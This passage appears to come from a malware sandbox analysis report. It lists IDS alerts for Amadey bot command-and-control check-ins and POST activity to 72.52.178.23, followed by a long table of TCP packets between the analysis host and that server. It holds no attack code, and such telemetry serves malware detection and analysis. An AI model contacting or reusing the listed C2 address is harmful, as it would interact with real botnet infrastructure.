                                                                                2024-11-29T01:53:24.994496+01002044597ET MALWARE Amadey Bot Activity (POST) M11192.168.2.44991372.52.178.2380TCP
                                                                                2024-11-29T01:53:25.627830+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.44991172.52.178.2380TCP
                                                                                2024-11-29T01:53:27.116604+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.44991472.52.178.2380TCP
                                                                                2024-11-29T01:53:27.597306+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.44992172.52.178.2380TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 29, 2024 01:52:04.460316896 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.460530996 CET4973180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.580347061 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.580411911 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.580421925 CET804973172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.580471992 CET4973180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.581871033 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.581976891 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.582056999 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.582140923 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.582485914 CET4973180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.701752901 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.701860905 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.701910973 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.701970100 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.701992989 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.702003002 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.702052116 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.702094078 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.702104092 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.702147961 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.702147961 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.702173948 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.702218056 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.820311069 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820334911 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820346117 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820389032 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820410967 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.820424080 CET804973172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820446014 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.821909904 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.821959972 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.821964025 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.821970940 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.822020054 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.822125912 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.822169065 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.822173119 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.822212934 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.865324974 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.865407944 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.981235981 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.981328964 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.029333115 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.029416084 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.145369053 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.241234064 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.241358995 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.485297918 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.485359907 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.534672976 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.538317919 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.605416059 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658423901 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658433914 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658462048 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658466101 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658504009 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658512115 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658544064 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.729379892 CET804973172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.730293036 CET4973180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.764666080 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.764731884 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.828640938 CET4973180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.829130888 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.948574066 CET804973172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.948987961 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.012587070 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.132772923 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.132895947 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.264380932 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.332396030 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.384409904 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.452488899 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.452554941 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.452677965 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.452703953 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.452795029 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.452821016 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572534084 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572721004 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572731018 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572738886 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572786093 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572794914 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572807074 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572829008 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572859049 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572879076 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572954893 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572963953 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573009968 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.573014975 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573051929 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573060989 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573065042 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.573102951 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.693243027 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693258047 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693280935 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693332911 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693336010 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.693373919 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.693521023 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693569899 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.737309933 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.737551928 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.857326984 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.857420921 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.905276060 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.905344963 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.021276951 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.021384954 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.117254019 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.117356062 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.237472057 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.237556934 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.317111969 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.320341110 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.320380926 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.370053053 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.370138884 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.425857067 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.440412045 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490231991 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490253925 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490298033 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490312099 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490463018 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.545933008 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.546009064 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.546147108 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.591523886 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.591587067 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.591630936 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.666069984 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.711514950 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.788748026 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.908853054 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.908987045 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909174919 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909291983 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909410954 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909450054 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029165030 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029239893 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029251099 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029314995 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029407024 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029422045 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029454947 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029474020 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029491901 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029511929 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029537916 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029555082 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029572010 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029582024 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029644966 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029673100 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029683113 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029690027 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029726028 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029726028 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.149770021 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149801016 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149818897 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149827957 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149885893 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.149914026 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.193228960 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.193392038 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.313263893 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.313375950 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.357228994 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.357292891 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.477284908 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.569313049 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.569434881 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.687855005 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.687931061 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.691239119 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.800637007 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.811140060 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.817306995 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.817354918 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.869137049 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.869256020 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.920717955 CET804973672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.920795918 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.937294960 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989275932 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989311934 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989384890 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989397049 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989413977 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989423037 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989468098 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.059854984 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.099112988 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.099184036 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.100692034 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.179948092 CET804973672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.220581055 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.318547010 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438601017 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.438678980 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438774109 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438805103 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438875914 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438915014 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.558993101 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559004068 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559010983 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559015036 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559029102 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559036970 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559043884 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559052944 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559084892 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559098005 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559099913 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.559142113 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.559150934 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559156895 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.559160948 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.559190989 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.559205055 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.679105043 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.679132938 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.679150105 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.679168940 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.679178953 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.679184914 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.679195881 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.679224014 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.679305077 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.679373026 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.721236944 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.721375942 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.841258049 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.842345953 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.885279894 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.886336088 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.005286932 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.006331921 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.093261003 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.096347094 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.107296944 CET804973672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.108473063 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.108508110 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.222187996 CET4973880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.228408098 CET804973672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.249299049 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.252445936 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.252619028 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.342226028 CET804973872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.344574928 CET4973880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.344719887 CET4973880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.464663982 CET804973872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.469680071 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.589862108 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.589945078 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.590292931 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.590323925 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.590398073 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.590428114 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.710164070 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710355997 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710365057 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710418940 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710427999 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.710453033 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710479975 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.710503101 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.710524082 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710534096 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710582018 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.710627079 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710643053 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710678101 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.710719109 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710733891 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710741997 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.710767031 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.710784912 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.830562115 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.830606937 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.830620050 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.830662012 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.830693960 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.830756903 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.830769062 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.830804110 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.873243093 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.873368025 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:10.993350029 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:10.993448973 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.041234970 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.041285992 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.157267094 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.253264904 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.253323078 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.501305103 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.504966021 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.528059959 CET804973872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.528470039 CET4973880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.543277025 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.544418097 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.555010080 CET4973880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.624931097 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.664534092 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.664549112 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.664567947 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.664576054 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.664623022 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.664632082 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.664664030 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.674901009 CET804973872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.698560953 CET4974080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.772835016 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.772929907 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.773050070 CET4973980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.818514109 CET804974072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.818634033 CET4974080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.828202009 CET4974080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:11.892956972 CET804973972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:11.948117971 CET804974072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.097167015 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.217081070 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.217152119 CET4974180192.168.2.472.52.178.23
